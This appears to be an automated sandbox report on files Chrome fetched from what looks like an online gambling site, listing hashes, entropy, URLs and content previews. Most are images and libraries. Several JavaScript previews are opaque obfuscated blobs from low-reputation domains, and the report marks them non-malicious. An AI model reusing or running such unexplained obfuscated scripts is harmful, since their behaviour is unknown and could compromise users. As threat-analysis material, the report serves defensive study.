                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAnAVgF0AaAbwCIB2ABQDMAWcgLloFc0YAXAS3UxGKdiaAJQVWSEAAIknAE7cu5ANwB5MACsQXAHQATELW5oQ1OSggg5nAJ6Yh5APqOQSALIo9rADYhyZADcob1YQJgBCAAYAXxFhfXtichgJThQAWysAZSsAxRAAIRQAD382Dh4+MTkQTlY5NCkAQVj4vUTyAAsQKAM5MvYuXjRMatr6xqhWtASHbxQAc2MczgGK4dHSGrqGqW5p2aTMtFY1oaqt8d30g/aHWhQUTiszypGxncaYW475zme5DYAOJQTJIV4bD4TKQLH4OYxIbgGCEXbbQgBecKSCKRhSgaBM/WI5XO70unyk3ix5FkNl8KLJaN2SGpxgMxQAYo8AQzNkzGnJWWh2QA1bggYC8qG7PTUozFEB6agoWRS8nQxzU9IoMDcXwAOQlSE6KElxMGbz5V0aEC1Or1fnN61R1qkYCFovFwGNprV/KkrDtegATABhVT6gAqwb9roAokGwxHIwBGWMUzoekDFfVQAKR7icelO0lWilArPFJpgFCsTgAVSy6ehACUtVBjGg883dsVqQtQSBvNxVSXLdLGpHqRBzNqe41aP3B0VSmPIerdjZp7OUHG0PIbPOpKpqZI5HkYIUSkeCtOoNZCQAZEerNcuikoWLKIJyKRQAC8pDzAsKBMKQtK+GBwBIpwnRMOQKb4LgECrt03ALJ0nDwfgKYof4aQQPBwaRHhxAQCqhbDPBUBgKgITPOQ0TRII3AQEgz6yEw2CkLYljwTwmSMWQvFhOQw6Xmgkj+MOsgAJLPOkXE8dmnChgAEvBgAyToA5o6AKo6gBcnv4MDeFA6LovBj6yaGcb6lkcaODZkZxi2/g+sAz4gJJYRRMQEFhKQzGKOgESRMQ3DpAsWRyDA8HQNw6IpjoEBoAsjGEMxPE2HxYnGHA/hBWg8HSS+8kgIp3HPMUqkaeQgAI
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (734), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):734
                                                                                                                                                          Entropy (8bit):4.868554581606508
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12:1cqBUdX00OlM3GryvrIqE/NtttAedDH0gh8q9ZupLfgDeZiMEdvjYvZF:1ckU100OWG+yrvdDH6qj+L/EdbYH
                                                                                                                                                          MD5:62F09514F62F2C58E309B97F7EFF9498
                                                                                                                                                          SHA1:B1D21B21AFF68B45A1F6974AF36072494B7C47A9
                                                                                                                                                          SHA-256:1E22021B5E32AA80920143FD9CEAF19732FFDDE177D964C92D1C517ABDF32EB8
                                                                                                                                                          SHA-512:A7179C68BCE3729FFE3CD393B6A458C4F24878AD6C7391D8AD04552B378209A4ABB3D5756078FB41E83E922C7AAFABDF4D0520FF7E70A8DB75827F543281EFD4
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://brhrjf.yuhu06.xyz/061410/rcenter/common/js/gamebox/common/ClassTool.js?v=1717580749344
                                                                                                                                                          Preview:define([],function(){var initializing=false,fnTest=/xyz/.test(function(){xyz})?/\b_super\b/:/.*/;this.Class=function(){};Class.extend=function(prop){var _super=this.prototype;initializing=true;var prototype=new this();initializing=false;for(var name in prop){prototype[name]=typeof prop[name]=="function"&&typeof _super[name]=="function"&&fnTest.test(prop[name])?(function(name,fn){return function(){var tmp=this._super;this._super=_super[name];var ret=fn.apply(this,arguments);this._super=tmp;return ret}})(name,prop[name]):prop[name]}function Class(){if(!initializing&&this.init){this.init.apply(this,arguments)}}Class.prototype=prototype;Class.prototype.constructor=Class;Class.extend=arguments.callee;return Class};return Class});
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):2026
                                                                                                                                                          Entropy (8bit):6.550833124518682
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:w/6NVd6V4knA9WIb102t0/3LwXj3E3HSy30ZYHlxtvjyznpqWRN:wSJlknmWIbD63sg3HSoHlPvunH
                                                                                                                                                          MD5:5E50D4E76B0014CC5521DAE3EEE4CDB8
                                                                                                                                                          SHA1:8EBE887A860F0CC896078FE1AC5CCBFC1057A529
                                                                                                                                                          SHA-256:3DC953ADC1D90DE566B011CCE2A3DE7B1EFBFD5F9F93E82C3CEDEF0E5C91F6DD
                                                                                                                                                          SHA-512:058176ADFF4BE9FD7BD05825546BC0C43B3F322D343288165D912365AC3F3C10E347AA6EF682F46C5C3B7E951CD336BE7168F008E5147E78A168C4B89A39A8C4
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/nav/icon-s/live_evo-i_w.png
                                                                                                                                                          Preview:.PNG........IHDR.............;0......pHYs.................iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 7.1-c000 79.b0f8be9, 2021/12/08-19:11:22 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmp:CreatorTool="Adobe Photoshop 23.2 (Windows)" xmp:CreateDate="2022-08-12T11:41:49+08:00" xmp:ModifyDate="2022-08-12T11:47:34+08:00" xmp:MetadataDate="2022-08-12T11:47:34+08:00" dc:format="image/png" photoshop:ColorMode="3" xmpMM:InstanceID="xmp.iid:9c358eab-39e0-a54c-99ae-0692b5390b5a" xmpMM:DocumentID="adobe:docid:photoshop:b387ea0c-2c61-f045-9e1c-ef5c35f3f642" xmpMM:OriginalDocumentID="xmp.did:0ac9fd
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 168x168, components 3
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):6871
                                                                                                                                                          Entropy (8bit):7.872376472792791
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:p7FikLUR+6X7MCy5nSb1jSG99DX8yclWGo2yscY8:pfA3+gSGjX25+Y8
                                                                                                                                                          MD5:99BE4BFE275809D4E436B77C991B1381
                                                                                                                                                          SHA1:54EADEE77394EB62CCF377AE68D9F49ACB5B6785
                                                                                                                                                          SHA-256:4CA35131972ACDF420B94F0D64A5A0F504EB5A7B0E6FB7B8B467916A12AAE37D
                                                                                                                                                          SHA-512:452A79B02619ED5C1E4F81FC5A4A209CB8A11D03AADB1841AE9BE18FBCA088652CDB54340329C1BF57771ABFB02FFED4BF75B61F4DF96866B7F2358C36AE75A3
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:......Exif..II*.................Ducky.......<...../http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c142 79.160924, 2017/07/13-01:06:39 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2018 (Windows)" xmpMM:InstanceID="xmp.iid:D4BE92C0D83711E8AF8CAD9701B14EA4" xmpMM:DocumentID="xmp.did:D4BE92C1D83711E8AF8CAD9701B14EA4"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:D4BE92BED83711E8AF8CAD9701B14EA4" stRef:documentID="xmp.did:D4BE92BFD83711E8AF8CAD9701B14EA4"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d.............................................................................................................................
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 12 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):193
                                                                                                                                                          Entropy (8bit):6.205020240126718
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6:6v/lhPk7LB/6TanghzaNpsbDp87NEYT+NXjp:6v/7y/6T7h4Sy7TE
                                                                                                                                                          MD5:EF5A8D982FC89F6572E6C0517DDB9738
                                                                                                                                                          SHA1:37EDC2B6C0C6C01B19C86A76101F0AC1783FFB67
                                                                                                                                                          SHA-256:58848858B0911D63F0F014F0594F1305195CF1320EE9A34FDAC5C93FDF450D06
                                                                                                                                                          SHA-512:E3719960637F84E7ABE3234FC8D074EEDA2A842C4C45C2A542F6021E0D03208F6B39F80241045FAA00ACF2F8DC953E759A2FE730DD8C2C51494F1F6CF15C69E8
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/index/125/top/icon_1.png
                                                                                                                                                          Preview:.PNG........IHDR............."a......pHYs................sIDAT(.....0.........s.Z.2.@.........'...).m.=0.D1<..P..*..HZ%.......&:...O.IR.h$.2..^{o.1z..t.....!..~..;..=m9`.(r.......IEND.B`.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 26 x 26, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1729
                                                                                                                                                          Entropy (8bit):7.26777357181042
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:v1hfvWwjx82lY2T3JVT5zRyJ3VlEpeG7JQieCtYJuPRMHK1HaWOjIkFG25BdSpfw:9ANn2NhpwJ3Xues2St0upMqwKoFJy7E
                                                                                                                                                          MD5:124FD6512C8333FEF3001D144961D3BC
                                                                                                                                                          SHA1:9B70AC5F12055B77507792F154C79466088D8042
                                                                                                                                                          SHA-256:5D52FE13181F4297F24EBAFF3A2D9AE39093B586E8E0D43746F8617758BB4B83
                                                                                                                                                          SHA-512:12C693B9CC591DF8319286C69F43E4D64D1B1DA2D2D6B376665B470CDC2226FF89B685208BA5AF41E4EB785C8514F36C9C6ECFF429102C6A863044757E9EA6D7
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR..............JL.....tEXtSoftware.Adobe ImageReadyq.e<...&iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)" xmpMM:InstanceID="xmp.iid:6C07B97E50A211E7962ACE6CF982F4B4" xmpMM:DocumentID="xmp.did:6C07B97F50A211E7962ACE6CF982F4B4"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:6C07B97C50A211E7962ACE6CF982F4B4" stRef:documentID="xmp.did:6C07B97D50A211E7962ACE6CF982F4B4"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>..~y...1IDATx..iHTQ...<....D.B..Q..-.!"-IZ&.$3,Z..5......!.2m1....E.*)...(..BD....-....y....}.....?.;..w.].]l7.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (748), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):748
                                                                                                                                                          Entropy (8bit):5.772469495138117
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12:4chW9SMdMwKZuzT+c2bwRgw7HhHzXkDrm8fokKtejNow3jKRnBC+t52LaS7qM:VOSMdpoKTubwG2lgD68ffKtfw3jAn15O
                                                                                                                                                          MD5:0490B02FD801BB98F9D89672C053224B
                                                                                                                                                          SHA1:F5A403B1C033B71BED1F56163BC62328CE1C8695
                                                                                                                                                          SHA-256:5AAC722538195969C337BFCF4C3124C336D3FBEE64087BE14210511904C5B68E
                                                                                                                                                          SHA-512:EEBDE6FF44AB032B5ED760EC76E3C6F1B804741FB3D17509EF1226BD556DC8ECF1A2AB25C89E20A304C0EAF10F3602C3B21F8A429D4057CDA5D737FC8255C2FB
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/240516-03/static/js/components/125/views/home/indexView.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAjABgGZCBdAGgG8wAXALwFkAuAMwFc0ZqBLdTEMtGWoBKCgCJWSEAAIk1AE5dOYgNwB5MACsQnAHQATEMy5oQABXkoIIedQCemQWID6zkEnop9rADYgxlABuUD6sIIwAhPgAvsIq1Jhi+FxmABZiwkKJ+DAQzBkqwfLSXAC8FDAoALYQ6CBo1EiMFNFk+lDUUCzsnDxomKLyINSs8mgUJoYAHgBqXCDAjNgk0a0wQx0g+t0c3LyiRdIgpdSpXEgCpcCTKMC6AMoA0gCSAHLxibgAgpoA5hmJXQAejEAGo0KCxEDJiAprpNEgMrpTvVMGxdn1HKIQLoACSmKbUAAqSjgaJ6e362N0MNm82ApTQNLQ0zmC1iHLW5SGLJsO16+woh2Op3OePWIE2AFE/FV6tRLqKkLpnFIfMwVTAAD5akAqIYjMbSfpifRcQIBChyDpKADCPigSCaYlpbOAYla2BNvgCSpVPkwftd9LI6IF/X4IgoBtGaGNiR8XEtMAdTsYLsqaGcYMDoNwwk9JqgydTTRxKagtFoZA6CiaFFSQ2YjBxjaMQig8l+wxbyM73eoq2EJALwmHBbI1u4MAASvVDPIAGJoJrLaKFTvSeQnRIzACqQIAHACuGQYGQIrhQxTMSBRAkxCBXkCZhlWmhfD4BJ+4kzDMwoF8ahSnkXRYVqWwkFaR9n1fflKT4ARRCHFQgA===")
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 20132
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):5007
                                                                                                                                                          Entropy (8bit):7.962533237385849
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:h3Q+ZbYzRFELdDRT8sbfMgpF8h2qtTg6WZ8W1gMijlmZkO7FhC:h3VbYzRSxpD8h2qtkF176ls5Q
                                                                                                                                                          MD5:8F17B626F7567907C75744E49F2A3F82
                                                                                                                                                          SHA1:7721233D4187213262BC270A30D51BD591AAA688
                                                                                                                                                          SHA-256:D6001C5431433A6DFCE869DA8A9467BAA51DEBC3220E116066AFE060D4919F73
                                                                                                                                                          SHA-512:35781E036E4A59DE28217D51F2E1B85DA14B623081E52483A965D90B228CB6B0DE34EF087BA6F14FAC04160193891F4ED324D08006B4115E830509227BBCBD5D
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://brhrjf.yuhu06.xyz/ftl/commonPage/js/bootstrap-dialog.min.js
                                                                                                                                                          Preview:...........<.s.6....t|.b...1R..c;....g...9..%..m..T.....v.E..%..{o^..H..../......7YY..?.6Y.6.+R&..2^..Q.:."&IV..9<d....*...6..p.V...".s..5....<.%yM...x!.-f..Yc.-co.>..,.....(..L..V.<.%.soS.f]..3......>..@]....b{m.."..A`.Qu0.. ).XW..'e...ySV...<....(..@..N.AJ.....R...a..IX..|...:].......P.!...y...}..}..}.>~.$hH........!.............;.W.....:.}~q.......>.;>==.x..(..t#...8.tTe.q./_......O....n.?\.W.g.w.2.L..<C.E....IJ......".I..$Z..)(..6.."...1..&(..;..%t......A.>..Y}.(?._......@b.....a../..%!..Uz...(.\..?....$AN..Y...y.F.25...HN..YK)....xl.....We....!.<Z....q9_..L..I.k.......`. j..u.*.F.....A...p.g.. ..eV..qP.W.F..QQg(..C}.ET.(&....]R.Q.H.."v...[~~.f..,.}......\.QC4....7..A%.i.s...........8....H.$/?.Ehr...O.S.Z..k.7.....'e.z.!...1.0$D.O...)..=.E...*W...7.|..8...u.d.$.....a..(t.5l.....!...z.i..*..P.....#..;.<..v...;.[#.|..!.V.m0.....pKW$....:<..l\t_$X....t..F.\........vP.e#.Q.............o.M.... .^.3.......S?..h....z.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 1092 x 720, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):103738
                                                                                                                                                          Entropy (8bit):7.953096936376712
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:2OUm/OAsVxwc2a+N92Nvxm4YxsmhzsKnJkmlP8MoSG+cGm3rZMM8a8QjtUotUTga:2CpU7m7OEnq80d5ZCQjtB92Jq38Tzl
                                                                                                                                                          MD5:FE21BC54B27A9F17051B8B20272B84ED
                                                                                                                                                          SHA1:B8F46EFF9DB9C7DDA22E84C6068217F5E5CFC19C
                                                                                                                                                          SHA-256:92BFAD1534C35E59192341700DD98B1FA3783085842A4E56F1EF6EF7C52B15A1
                                                                                                                                                          SHA-512:FD9183A940A4115C4937786CAE5AF64C115FC70537C46B58DF7001241DD3C9A4DE2101167A8055032EA132CF8A2ED0CE79AF5A3D275F975A4CE5B1518E430CE4
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://8vpfnx.eveday.me/061410/rcenter/common/images/errors/bet-ico-bg.png
                                                                                                                                                          Preview:.PNG........IHDR...D............L....tEXtSoftware.Adobe ImageReadyq.e<....IDATx.......{.s..<.4.(. .. $c!l!. ...w.......g...2...}.........8..e.o..$c...D.B(..&......W]SS...'u..v}f...v..r.9.{.R2.d..........z............z............t..T.I.T..H...&.C>..h.K..A.9..6.0.........*.........Ur[E.$.6...Q..T].T........-.m[.O.....c..(.<.l....].J(.....'K.!. ....... .Q....*..`.......5R...L;S4..g....G.......h.DDf.U..E..K...P.v.X....gTIDq.... .V...b.._>|.F....f.K..4....".U....T....~.....G..{Fn.,..w........1Z>.Z..X.9#... F..T...........z.I....-..l.M...B.V...8.L..kH.......m.0....s4.V.......K........e4....Sf.q.2S..A!P...Q. .%..@...?h.D.N.p.2'..oz,.... {...C...>.L..dLf.g......t..<S...../....b1..>Sw&...#_.+..5..$.....Y(.J.p8.x0.K>!....$....1...Cq>.."u.......*Xzr...3d......L1....e.k:..T."Q<:..r..,...B..X..e.. "..G.X.2.`0.W..m.....j...?....~Z.H..y../.....3........Z.?.V.....^}..%K.O..?.c.M_.RWuUU"..*B.C........g.......=T.hMp.eS.Wf..A.Q.........{...<.{L.......9.U%p.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 1 x 1, 1-bit colormap, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):98
                                                                                                                                                          Entropy (8bit):4.580480016229387
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:yionv//thPlE+kSI+DthC9/kITQoWlED//jp:6v/lhPfkCDtETT9WlEDTp
                                                                                                                                                          MD5:73DF4484683667DA60643329AF7DBDD9
                                                                                                                                                          SHA1:9AE16E29D964C6A1ADE80D1A98FDAC225C8DC291
                                                                                                                                                          SHA-256:D5C956BFFB7565A9DF0E1B3C80AFBA091A617944474243FE8C90D606D75090EC
                                                                                                                                                          SHA-512:29C8C67E0412D06164C72BF9B15B0C24FA5EC1015F11EC57653AA7B28561FC5FCE7384302A8C7978D1C9E3AA88939AF3C64FC68AF38844AC4DC3E72D7E6C76C1
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb1-hw.qectyoua.com/cc.png?r=6084701866
                                                                                                                                                          Preview:.PNG........IHDR.............%.V.....gAMA......a.....PLTE...........IDAT..c`.......!.3....IEND.B`.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:GIF image data, version 89a, 1000 x 100
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):239435
                                                                                                                                                          Entropy (8bit):7.980012486412165
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3072:JMzfCCYKZkXsomSwH/RAcM8Ve6ISxls9M8Ve6ISxls9M8Veo+bTyr+plDTZqr+pz:JMzfCCRACTZAcM8HwM8HwM8W7p/p/pJ
                                                                                                                                                          MD5:A3CA3C28FEAF4A7BCBB08E1AFA8A0FBA
                                                                                                                                                          SHA1:6B743D5C53DBBFDE05099DCC864D17051E46C9D7
                                                                                                                                                          SHA-256:AA446B9E62778793406FFE7C68B14BAF046B7596A5F1BD8A341B60D12BDD8B1B
                                                                                                                                                          SHA-512:B59BB90C7097E872422CE986EDD4536EA3F4D6244F90C820DD0F5BCE9FAE3FA1AEF7A77E0DEECCC16F39CCDF2764653C10EDA2EB96AFF0F3689BE4F47C02BA59
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:GIF89a..d....w......R........s.*........S...w%..!...o..+......f..P......k.Ls...I$......e....*1.N...+............W%.q.....M...vF...J..d...h4...N........).........Q'.....tH.i...E....gg.!....K...#...rj...!.....i+%$$....c..{.5#.Q...l........V.....H#...o/.....q.....8.g!.....S..j.......$...mq^PoM+.X0..>...k(""ni..i.._.....oEme.s.Q.8....8.x9.rH..%tl.[W..(#kc...k.O..#..8..)......j.$..G.#......w......V.![...9..6..."...q..4.b.nl#. J&'.re.7.e .....x..{..5.".U.!..NC&.....x.M?..U.c5.."......6.QQ.."..U.....C.....$..H<'.B..............i....tn.x..`>....o.n,.k7...PN..*#.yN.K,.+..O..7..#...x6RE.....0.[P..L"....-..........d5%.......!........:......$.7.$&....4..#......s.../.%.2..T....Fw......>-.OE..E../.d.1........;.....|....8.....r..............!..NETSCAPE2.0.....!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.171c27fab, 2022/08/16-22:35:41 "> <rdf:RDF xmlns:rdf=
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JSON data
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):1128
                                                                                                                                                          Entropy (8bit):5.481804985828627
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:YvZLFLJxw8R5RWorwilchF7i+3XRH9oH5LxOCE+MIR4QRBRKrfjj:Yv1FLJxwewo9E0ZLxh141z
                                                                                                                                                          MD5:D09B10A7A007BF78EEEB09FA29C8C1AB
                                                                                                                                                          SHA1:0B61E0D1118C5E403CFABEE428A75568CA2E79CC
                                                                                                                                                          SHA-256:ED157AC83CCFD16499961A0B7046F00086E7CDE60E16AA8190220A29A25AAA96
                                                                                                                                                          SHA-512:2259613EDB7C6A3A0C3F22FDAA595C08E25DA559EF73B7A27DE35683493F26791890852703A46946ED12DB80E0FD0307AA15378D41F0B354F8E177577F2538E4
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://ahd-ocssn.qqxgo.com/zb-cloud/stat.do?pv=ajax&pa=host.info&domain=yh8613.cc&terminal=1&r=3506563745
                                                                                                                                                          Preview:{"analyticsCode":" (function(a, b, c, d, e, j, s) { a[d] = a[d] || function() { (a[d].a = a[d].a || []).push(arguments) }; j = b.createElement(c), s = b.getElementsByTagName(c)[0]; j.async = true; j.charset = 'UTF-8'; j.src = 'https://static.meiqia.com/widget/loader.js'; s.parentNode.insertBefore(j, s); })(window, document, 'script', '_MEIQIA'); _MEIQIA('entId', '2bacc0c831e1b000832b0c92c2a0f627');","domainType":1,"snType":1,"agentCode":"","paymentType":1,"h5AppLayerFlag":1,"zone":"","sn":"uy09","firstPageFlag":1,"forwardUrl":null,"isZone":false,"settings":{},"httpsEnabled":0,"loginBg":"","webPath":"t3685","httpsSupport":0,"analyticsJs":null,"loginLogo":"","name":".....","onlineCustomerServiceUrl":"https://yh1.ywkf89.cc/chatlink.html","preventPageFlag":1,"currencyCode":"CNY","icon":"/fileupload/uy09/202108/202108190259527.png","snStatus":1,"webTitle":".......","isMaintain"
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (34888), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):34888
                                                                                                                                                          Entropy (8bit):5.980968634743434
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:CJtKVExV+YblDV3XQ2ftp3XyBEeAstLiv3rIs8qLDM4w4ov:HVEuYblDfjhkcb8oo4Fg
                                                                                                                                                          MD5:9ADE5E638AC25F3589817E3E2F3CB74C
                                                                                                                                                          SHA1:62E6016D419A3E4A5FC5A17DB8C79DBEF4DDBF4F
                                                                                                                                                          SHA-256:61DA4F7CA1099C1344F177742C485F1128AC6FE61BB8DAEBF320733BAB65372B
                                                                                                                                                          SHA-512:9EC7E31B4B579C72BF6D46F1632060C6A01814B926CB39D2FE72D98F00BF1940079148938F8A956BEABE78E783AAA6F693D9E93783C8FD5E62252E7FFF36658C
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/240516-03/static/js/components/layer.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAjAZgBYBWAXQBoBvAIgAYBhALwE9qAuAMwFc0YAXAJbpMIcn3ICAlJQBuUAE4ACJAF4aAOgD0fXADZa+TQBsozEPPUArJO2zVizBF2rlcATlwAOCtS198tABMgcam5lY2bHZoAI6acC7uuIQ+fgH4bqFmFta21AAyACIAcsCJHrSp2vjJhibZEXmeHMQAiuW0ulX+esRZ4blR1AAaABIAmgBaHYHdNQDsdWE5kXYAsgDKALbtrp5u3uS+1YF6/St5jDAAggDyifspR2mnnueNQ/jXXCgPbpXPE66TL1AarahgPgbQIPTxdQH+Gog5YfOx8YYwaZ7TyzBH4DK6d6DOwgAAeAHMAAoPeaHY7+Qg1IngwLEABinhpT3pRHmuGZeUCABMIAgaQCeYR5iFQRchvJGJpOXtdPDJfNCAKhkh8jAtg9dLjJZ5+bLUdQUMw3OMHsQ6WlCG5NWbidRAoxKTJbdyHW4+i7wVsANS6Iy2iVpYi0WhauwcSkwNYPQhqyO0N4BvJIAAWfDQyaNkeSseoWwAkghCg98PbqsQAiWULpRtnqz660zM0NWmWIL89gE5sRCKaUa6AKrXSlsh6BVN1xklkNcYizwsL51j8EbGBcCAPLxDw2NkAQABKB/b/mIbkJXbsumujHze1wuCHBxL2YAKowhQ9aHmOZ9HmEt5AEDZVz2AxgJHJcjGARhEnmNw3GA4hRwaV0EEmSYElcFCyDxXRiBlLc8l0ABxGQxQIjxgN0UD72oDh8HkDhkM8IDiPmf1yPlEBaAAIU4/BgJQktiDLRgwwIlDgM8PisPBAA1IVNBnOSiJ5XRPAzfi7EsUZRig3B5j5OY+SUsE8nHNZcF2MzGMs/QSzZJAAHV/wI3QxLxeZdEwmyhkIARcBsAib0sxYS10Yo4DKSLtLSczN2UvJJkINkYGQjDousuU7FuZgIG8sypWi5F0qGYYuGGEBk
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (34888), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):34888
                                                                                                                                                          Entropy (8bit):5.980968634743434
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:CJtKVExV+YblDV3XQ2ftp3XyBEeAstLiv3rIs8qLDM4w4ov:HVEuYblDfjhkcb8oo4Fg
                                                                                                                                                          MD5:9ADE5E638AC25F3589817E3E2F3CB74C
                                                                                                                                                          SHA1:62E6016D419A3E4A5FC5A17DB8C79DBEF4DDBF4F
                                                                                                                                                          SHA-256:61DA4F7CA1099C1344F177742C485F1128AC6FE61BB8DAEBF320733BAB65372B
                                                                                                                                                          SHA-512:9EC7E31B4B579C72BF6D46F1632060C6A01814B926CB39D2FE72D98F00BF1940079148938F8A956BEABE78E783AAA6F693D9E93783C8FD5E62252E7FFF36658C
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb1-hw.qectyoua.com/pc/240516-03/static/js/components/layer.js
